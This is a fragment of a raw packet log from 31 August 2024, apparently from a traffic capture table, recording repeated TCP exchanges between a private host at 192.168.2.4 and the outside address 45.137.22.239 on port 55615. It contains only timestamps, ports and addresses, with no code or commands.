                    Aug 31, 2024 14:42:21.217497110 CEST4974855615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:21.217538118 CEST4974855615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:21.217686892 CEST556154974845.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:21.217695951 CEST556154974845.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:21.217739105 CEST4974855615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:21.220343113 CEST556154974845.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:21.220395088 CEST556154974845.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:21.220402956 CEST556154974845.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:21.220419884 CEST4974855615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:21.220434904 CEST4974855615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:21.220520973 CEST556154974845.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:21.220530033 CEST556154974845.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:21.220536947 CEST556154974845.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:21.220546961 CEST556154974845.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:21.220563889 CEST4974855615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:21.220577955 CEST4974855615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:21.220719099 CEST556154974845.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:21.220726967 CEST556154974845.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:21.220773935 CEST4974855615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:21.220886946 CEST556154974845.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:21.220930099 CEST4974855615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:21.221098900 CEST556154974845.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:21.221143961 CEST556154974845.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:21.221152067 CEST556154974845.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:21.221155882 CEST4974855615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:21.221183062 CEST4974855615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:21.221204042 CEST4974855615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:21.221328020 CEST556154974845.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:21.221330881 CEST556154974845.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:21.221368074 CEST556154974845.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:21.221386909 CEST4974855615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:21.221404076 CEST4974855615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:21.221434116 CEST556154974845.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:21.221478939 CEST4974855615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:21.221484900 CEST556154974845.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:21.221524954 CEST4974855615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:21.221560001 CEST556154974845.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:21.221606970 CEST4974855615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:21.221754074 CEST556154974845.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:21.221802950 CEST4974855615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:21.221956968 CEST556154974845.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:21.221987009 CEST556154974845.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:21.221995115 CEST556154974845.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:21.222004890 CEST4974855615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:21.222035885 CEST4974855615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:21.222124100 CEST556154974845.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:21.222131968 CEST556154974845.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:21.222138882 CEST556154974845.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:21.222163916 CEST4974855615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:21.222178936 CEST4974855615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:21.222253084 CEST556154974845.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:21.222260952 CEST556154974845.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:21.222301960 CEST4974855615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:21.222306967 CEST556154974845.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:21.222342968 CEST4974855615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:21.222428083 CEST556154974845.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:21.222435951 CEST556154974845.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:21.222479105 CEST4974855615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:21.222623110 CEST556154974845.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:21.222624063 CEST556154974845.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:21.222666025 CEST4974855615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:21.225208044 CEST556154974845.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:21.225251913 CEST556154974845.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:21.225251913 CEST4974855615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:21.225260019 CEST556154974845.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:21.225301027 CEST4974855615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:21.225312948 CEST556154974845.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:21.225321054 CEST556154974845.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:21.225352049 CEST4974855615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:21.225363970 CEST4974855615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:21.225379944 CEST556154974845.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:21.225388050 CEST556154974845.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:21.225414038 CEST4974855615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:21.225431919 CEST4974855615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:21.225435019 CEST556154974845.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:21.225485086 CEST4974855615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:21.225600958 CEST556154974845.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:21.225609064 CEST556154974845.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:21.225644112 CEST4974855615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:21.225750923 CEST556154974845.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:21.225790977 CEST4974855615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:21.225904942 CEST556154974845.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:21.225955009 CEST4974855615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:21.225986958 CEST556154974845.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:21.225994110 CEST556154974845.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:21.226026058 CEST4974855615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:21.226036072 CEST4974855615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:21.226278067 CEST556154974845.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:21.226286888 CEST556154974845.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:21.226294041 CEST556154974845.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:21.226310968 CEST556154974845.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:21.226319075 CEST556154974845.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:21.226329088 CEST4974855615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:21.226329088 CEST4974855615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:21.226349115 CEST4974855615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:21.226367950 CEST4974855615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:21.226433992 CEST556154974845.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:21.226528883 CEST4974855615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:21.226546049 CEST556154974845.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:21.226586103 CEST4974855615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:21.226797104 CEST556154974845.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:21.226805925 CEST556154974845.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:21.226836920 CEST4974855615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:21.226843119 CEST556154974845.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:21.226844072 CEST4974855615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:21.226880074 CEST4974855615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:21.226910114 CEST556154974845.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:21.226958036 CEST4974855615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:21.226964951 CEST556154974845.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:21.226973057 CEST556154974845.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:21.227046013 CEST4974855615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:21.227047920 CEST556154974845.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:21.227097034 CEST4974855615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:21.227116108 CEST556154974845.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:21.227124929 CEST556154974845.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:21.227150917 CEST4974855615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:21.227169037 CEST4974855615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:21.227360010 CEST556154974845.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:21.227366924 CEST556154974845.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:21.227401018 CEST4974855615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:21.227411985 CEST4974855615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:21.227502108 CEST556154974845.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:21.227529049 CEST556154974845.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:21.227572918 CEST4974855615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:21.230129957 CEST556154974845.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:21.230132103 CEST556154974845.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:21.230134964 CEST556154974845.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:21.230180979 CEST4974855615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:21.230212927 CEST556154974845.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:21.230221033 CEST556154974845.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:21.230262041 CEST4974855615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:21.230299950 CEST556154974845.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:21.230308056 CEST556154974845.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:21.230317116 CEST556154974845.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:21.230351925 CEST4974855615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:21.230365038 CEST4974855615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:21.230473995 CEST556154974845.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:21.230483055 CEST556154974845.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:21.230525017 CEST4974855615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:21.230623007 CEST556154974845.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:21.230671883 CEST4974855615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:21.230735064 CEST556154974845.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:21.230787992 CEST4974855615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:21.230811119 CEST556154974845.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:21.230818033 CEST556154974845.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:21.230859041 CEST4974855615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:21.231086969 CEST556154974845.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:21.231151104 CEST4974855615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:21.231178045 CEST556154974845.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:21.231187105 CEST556154974845.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:21.231203079 CEST556154974845.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:21.231210947 CEST556154974845.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:21.231219053 CEST4974855615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:21.231220961 CEST556154974845.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:21.231251955 CEST4974855615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:21.231266022 CEST4974855615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:21.231280088 CEST556154974845.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:21.231318951 CEST4974855615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:21.231508017 CEST556154974845.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:21.231556892 CEST4974855615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:21.231617928 CEST556154974845.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:21.231633902 CEST556154974845.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:21.231676102 CEST4974855615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:21.231686115 CEST556154974845.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:21.231730938 CEST4974855615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:21.231756926 CEST556154974845.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:21.231805086 CEST4974855615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:21.231834888 CEST556154974845.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:21.231842995 CEST556154974845.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:21.231901884 CEST4974855615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:21.231967926 CEST556154974845.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:21.231976032 CEST556154974845.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:21.231982946 CEST556154974845.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:21.232021093 CEST4974855615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:21.232033968 CEST4974855615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:21.232134104 CEST556154974845.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:21.232178926 CEST556154974845.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:21.232300997 CEST556154974845.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:21.232355118 CEST556154974845.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:21.235250950 CEST556154974845.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:21.235260963 CEST556154974845.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:21.235264063 CEST556154974845.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:21.235270977 CEST556154974845.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:21.235275984 CEST556154974845.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:21.235282898 CEST556154974845.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:21.235439062 CEST556154974845.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:21.235449076 CEST556154974845.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:21.235455990 CEST556154974845.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:21.235459089 CEST556154974845.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:21.235754967 CEST556154974845.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:21.235763073 CEST556154974845.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:21.235914946 CEST556154974845.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:21.235923052 CEST556154974845.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:21.236202955 CEST556154974845.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:21.236210108 CEST556154974845.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:21.236217976 CEST556154974845.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:21.236341953 CEST556154974845.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:21.236350060 CEST556154974845.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:21.236356974 CEST556154974845.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:21.236365080 CEST556154974845.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:21.236494064 CEST556154974845.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:21.236649990 CEST556154974845.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:21.236658096 CEST556154974845.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:21.236798048 CEST556154974845.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:21.236804962 CEST556154974845.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:21.236813068 CEST556154974845.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:21.236819983 CEST556154974845.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:21.236859083 CEST556154974845.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:21.237035990 CEST556154974845.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:21.237044096 CEST556154974845.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:21.280884027 CEST556154974845.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.144268036 CEST556154974845.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.148755074 CEST4974955615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:22.153661013 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.153939962 CEST4974955615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:22.154294968 CEST4974955615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:22.159380913 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.196754932 CEST4974855615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:22.508507967 CEST4974955615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:22.513447046 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.513458967 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.513474941 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.513482094 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.513489962 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.513515949 CEST4974955615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:22.513541937 CEST4974955615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:22.513803959 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.513813019 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.513816118 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.513823032 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.513861895 CEST4974955615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:22.513899088 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.513942957 CEST4974955615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:22.518338919 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.518393993 CEST4974955615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:22.518424988 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.518434048 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.518449068 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.518455982 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.518472910 CEST4974955615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:22.518479109 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.518495083 CEST4974955615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:22.518526077 CEST4974955615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:22.560597897 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.560833931 CEST4974955615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:22.591912985 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.592834949 CEST4974955615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:22.597718000 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.597726107 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.597764969 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.597773075 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.597778082 CEST4974955615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:22.597806931 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.597812891 CEST4974955615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:22.597815037 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.597836018 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.597845078 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.597851992 CEST4974955615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:22.597868919 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.597877026 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.597888947 CEST4974955615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:22.597906113 CEST4974955615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:22.597917080 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.598165035 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.598181963 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.598212957 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.598229885 CEST4974955615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:22.598256111 CEST4974955615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:22.598270893 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.598293066 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.598342896 CEST4974955615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:22.598500013 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.600707054 CEST4974955615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:22.602783918 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.603032112 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.603127956 CEST4974955615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:22.603218079 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.603245020 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.603283882 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.603305101 CEST4974955615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:22.603332043 CEST4974955615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:22.603348017 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.603390932 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.603418112 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.603441954 CEST4974955615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:22.603456020 CEST4974955615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:22.603476048 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.603545904 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.603588104 CEST4974955615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:22.603609085 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.603652954 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.603689909 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.603698969 CEST4974955615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:22.603734970 CEST4974955615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:22.605501890 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.606168985 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.606175900 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.606245041 CEST4974955615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:22.606266975 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.606276035 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.606278896 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.606296062 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.606302977 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.606309891 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.606311083 CEST4974955615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:22.606323004 CEST4974955615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:22.606328011 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.606358051 CEST4974955615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:22.606372118 CEST4974955615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:22.607920885 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.607969046 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.607975960 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.608016968 CEST4974955615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:22.608032942 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.608041048 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.608074903 CEST4974955615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:22.608102083 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.608109951 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.608124018 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.608131886 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.608155012 CEST4974955615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:22.608164072 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.608171940 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.608175039 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.608182907 CEST4974955615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:22.608191013 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.608208895 CEST4974955615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:22.608231068 CEST4974955615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:22.608234882 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.608242989 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.608249903 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.608287096 CEST4974955615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:22.608293056 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.608300924 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.608335972 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.608336926 CEST4974955615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:22.608344078 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.608365059 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.608374119 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.608383894 CEST4974955615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:22.608402967 CEST4974955615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:22.608524084 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.608565092 CEST4974955615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:22.608575106 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.608622074 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.608665943 CEST4974955615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:22.608730078 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.608738899 CEST556154974945.137.22.239192.168.2.4
